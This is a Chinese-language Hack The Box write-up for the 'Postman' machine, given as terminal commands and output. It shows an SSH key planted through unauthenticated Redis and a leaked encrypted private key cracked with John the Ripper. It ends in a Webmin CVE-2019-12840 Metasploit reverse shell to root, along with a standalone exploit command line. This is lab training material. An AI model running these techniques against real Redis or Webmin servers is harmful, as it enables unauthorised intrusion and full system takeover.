Postman-htb-writeup

0x00 靶场技能介绍

章节技能：redis未授权访问、redis主从复制秘钥提权、id_rsa访问密码破解、目录枚举、CVE-2019-12840漏洞利用

参考链接：https://0xdf.gitlab.io/2020/03/14/htb-postman.html

参考链接：https://snowscan.io/htb-writeup-postman/#

0x01 用户权限获取

1、获取下靶机地址：10.10.10.160

2、获取下开放端口信息

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p- --min-rate=10000  10.10.10.160
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 23:39 CST
Warning: 10.10.10.160 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.160
Host is up (0.32s latency).
Not shown: 53457 closed tcp ports (reset), 12074 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
|   256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
|_  256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
80/tcp    open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: The Cyber Geek's Personal Website
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp  open  redis   Redis key-value store 4.0.9
10000/tcp open  http    MiniServ 1.910 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.910
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.63 seconds

3、尝试下6379 redis的操作

┌──(kali㉿kali)-[~/桌面]
└─$ nc 10.10.10.160 6379
keys *
*0

4、使用redis-cli客户端进行操作，发现可以进行创建数据

┌──(kali㉿kali)-[~/桌面]
└─$ redis-cli -h 10.10.10.160
10.10.10.160:6379> keys *
(empty array)
10.10.10.160:6379> incr shiyan
(integer) 1
10.10.10.160:6379> keys *
1) "shiyan"
(1.06s)
10.10.10.160:6379> get shiyan
"1"
10.10.10.160:6379>

5、使用主从复制进行提权，获取第一个反弹shell

一种使用 主从复制通过 Redis 获取 RCE 的已知方法。我在这里无法实现这一点（我将在 Beyond Root 中了解原因）。另外，这个漏洞经常会将redis实例设置为无法写入的状态，从而导致释放盒子时发生大量重置。

由于我可以写入 redis，因此当用户 redis 运行时，我基本上可以通过使用 save 命令将数据库写入文件来对文件系统进行任意写入。它“几乎任意”的原因是因为我无法干净地写入文件，但相反，我可以在两边写入垃圾内容。但 Linux 上有许多基于文件的攻击对于额外的垃圾具有鲁棒性。例如，编写 SSH 密钥。 sshd 将忽略垃圾行，并处理 authorized_keys 文件中具有公钥的行。

我可以猜测这可能是运行 redis 服务器主目录的用户。我可以通过将当前目录更改为 ./.ssh 来确认：

10.10.10.160:6379> config set dir ./.ssh
OK
(0.68s)
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis/.ssh"
10.10.10.160:6379>

6、本地开始使用生成 ssh秘钥，进行秘钥上传进行登录

我将使用 ssh-keygen 生成一个密钥，然后将其添加到一个文件中，并在密钥前后添加一些额外的换行符：

┌──(kali㉿kali)-[~]
└─$ cd .ssh

┌──(kali㉿kali)-[~/.ssh]
└─$ ls    
id_rsa  id_rsa.pub  known_hosts  known_hosts.old

┌──(kali㉿kali)-[~/.ssh]
└─$ ssh-keygen -t rsa -b 2048
Generating public/private rsa key pair.
Enter file in which to save the key (/home/kali/.ssh/id_rsa): 
/home/kali/.ssh/id_rsa already exists.
Overwrite (y/n)? 

┌──(kali㉿kali)-[~/.ssh]
└─$ ls
id_rsa  id_rsa.pub  known_hosts  known_hosts.old

Redis 将把一个二进制数据库文件写入 authorized_keys，然后 sshd 将将该文件作为 ASCII 文本文件打开并读取它逐行查找与发送给它的私钥相匹配的公钥。换行符将有助于确保公钥在文件中独占一行。

我可以使用 中的 -x 选项，它将“从 STDIN 读取最后一个参数”到 文件写入 并将其值设置到数据库中：redis-clicatredis-cli

┌──(kali㉿kali)-[~/.ssh]
└─$ (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > spaced_key.txt

┌──(kali㉿kali)-[~/.ssh]
└─$ ls
id_rsa  id_rsa.pub  known_hosts  known_hosts.old  spaced_key.txt

┌──(kali㉿kali)-[~/.ssh]
└─$ cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set shiyan
OK

接下来我会告诉redis dbname是authorized_keys，然后save：

10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
(1.35s)
10.10.10.160:6379>

7、然后使用自己的秘钥进行登录远程的靶机

┌──(kali㉿kali)-[~/桌面]
└─$ ssh -i ~/.ssh/id_rsa redis@10.10.10.160
The authenticity of host '10.10.10.160 (10.10.10.160)' can't be established.
ED25519 key fingerprint is SHA256:eBdalosj8xYLuCyv0MFDgHIabjJ9l3TMv1GYjZdxY9Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.160' (ED25519) to the list of known hosts.
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$ ls -la /home
total 12
drwxr-xr-x  3 root root 4096 Sep 11  2019 .
drwxr-xr-x 22 root root 4096 Sep 30  2020 ..
drwxr-xr-x  6 Matt Matt 4096 Sep 11  2019 Matt
redis@Postman:~$ 

8、通过信息枚举，发现了一个 id_rsa.bak 文件

redis@Postman:~$ ls -la /opt
total 12
drwxr-xr-x  2 root root 4096 Sep 11  2019 .
drwxr-xr-x 22 root root 4096 Sep 30  2020 ..
-rwxr-xr-x  1 Matt Matt 1743 Aug 26  2019 id_rsa.bak
redis@Postman:~$ file /opt/id_rsa.bak 
/opt/id_rsa.bak: PEM RSA private key
redis@Postman:~$ cat /opt/id_rsa.bak 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
redis@Postman:~$

9、下载到本地，发现使用该秘钥存在密码限制，需要进行破解

┌──(kali㉿kali)-[~/桌面]
└─$ touch id_rsa.bak

┌──(kali㉿kali)-[~/桌面]
└─$ ssh2john id_rsa.bak > hash.txt

┌──(kali㉿kali)-[~/桌面]
└─$ sudo john ./hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008     (id_rsa.bak)     
1g 0:00:00:00 DONE (2023-12-17 00:10) 7.692g/s 1898Kp/s 1898Kc/s 1898KC/s concubine..comett
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

10、破解后发现依旧无法进行ssh登录，但是发现可以密码复用，Matt 的登录密码就是 computer2008

11、通过在初始shell中获取到第一个flag信息

redis@Postman:~$ ls /home
Matt
redis@Postman:~$ su Matt
Password: 
Matt@Postman:/var/lib/redis$ cd ~
Matt@Postman:~$ cat user.txt
11c882e77a80e09508d34ca8b8d336d3
Matt@Postman:~$ 

12、无法远程ssh登录的原因在配置文件里

Matt@Postman:~$ cat /etc/ssh/sshd_config
#       $OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
AuthorizedKeysFile      .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes

#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

#deny users            ----------- 因为这行的原因
DenyUsers Matt

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server
Matt@Postman:~$

0x02 系统权限获取

13、通过访问 10000 端口发现了一些信息

http://10.10.10.160:10000/

14、本地设置下hosts再次访问

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.160 Postman" | sudo tee -a /etc/hosts
10.10.10.160 Postman

15、发现 Webmin 服务，而 Webmin 通常以 root 身份运行，以允许它执行所有管理操作。

16、使用 Matt:computer2008 成功登录后台，并获取到版本信息

17、查找涉及的提权漏洞

┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit Webmin 1.910            
------------------------------------------------------- ---------------------------------
 Exploit Title                                         |  Path
------------------------------------------------------- ---------------------------------
Webmin 1.910 - 'Package Updates' Remote Command Execut | linux/remote/46984.rb
Webmin < 1.920 - 'rpc.cgi' Remote Code Execution (Meta | linux/webapps/47330.rb
------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                         
┌──(kali㉿kali)-[~/桌面]
└─$ searchsploit -m linux/remote/46984.rb
  Exploit: Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)
      URL: https://www.exploit-db.com/exploits/46984
     Path: /usr/share/exploitdb/exploits/linux/remote/46984.rb
    Codes: CVE-2019-12840
 Verified: True
File Type: Ruby script, Unicode text, UTF-8 text
Copied to: /home/kali/桌面/46984.rb

18、通过各种exp的使用，最后还是使用了msf成功获取到最终的flag信息

https://github.com/roughiz/Webmin-1.910-Exploit-Script/blob/master/webmin_exploit.py

webmin_exploit.py --rhost postman --rport 10000 -u Matt -p computer2008 --lhost 10.10.14.10 --lport 443 -s true

┌──(kali㉿kali)-[~/桌面]
└─$ msfconsole
Metasploit tip: Set the current module's RHOSTS with database values using 
hosts -R or services -R
                                                  

      .:okOOOkdc'           'cdkOOOko:.
    .xOOOOOOOOOOOOc       cOOOOOOOOOOOOx.
   :OOOOOOOOOOOOOOOk,   ,kOOOOOOOOOOOOOOO:
  'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
  oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
  dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
  lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
  .OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
   cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
    oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
     lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
      ;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
       .dOOo'WM.OOOOocccxOOOO.MX'xOOd.
         ,kOl'M.OOOOOOOOOOOOO.M'dOk,
           :kk;.OOOOOOOOOOOOO.;Ok:
             ;kOOOOOOOOOOOOOOOk:
               ,xOOOOOOOOOOOx,
                 .lOOOOOOOl.
                    ,dOd,
                      .

       =[ metasploit v6.3.45-dev                          ]
+ -- --=[ 2377 exploits - 1232 auxiliary - 416 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

smsf6 > search CVE-2019-12840

Matching Modules
================

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/linux/http/webmin_packageup_rce  2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/webmin_packageup_rce                                                                 

msf6 > use exploit/linux/http/webmin_packageup_rce
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:h
                                         ost:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploi
                                         t.com/docs/using-metasploit/basics/using-metas
                                         ploit.html
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.14.10
LHOST => 10.10.14.10
msf6 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 10.10.14.10:4444 
[+] Session cookie: 777dce079d3dccfe40fd4dcb646f5f71
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.10:4444 -> 10.10.10.160:43086) at 2023-12-17 00:52:35 +0800

id
uid=0(root) gid=0(root) groups=0(root)
cd /root/root.txt
cat /root/root.txt
5c456efc266deccdf22e3c5717b48393

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/215